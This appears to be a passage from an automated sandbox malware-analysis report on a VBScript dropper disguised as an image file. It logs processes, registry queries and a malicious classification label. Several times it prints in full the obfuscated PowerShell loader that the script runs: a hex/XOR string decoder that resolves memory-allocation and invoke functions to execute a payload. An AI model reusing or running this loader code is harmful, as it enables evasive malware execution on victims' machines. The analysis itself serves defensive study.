Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB '97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5CJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_01
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1go55f2h.l20.ps1Jump to behavior
Source: classification engineClassification label: mal64.evad.winVBS@6/2@0/0
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("powershell.exe", " "$Badeanstalt = """reFLiuEfnBrcExtApiH", "", "", "0");
Obfuscated command line found
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
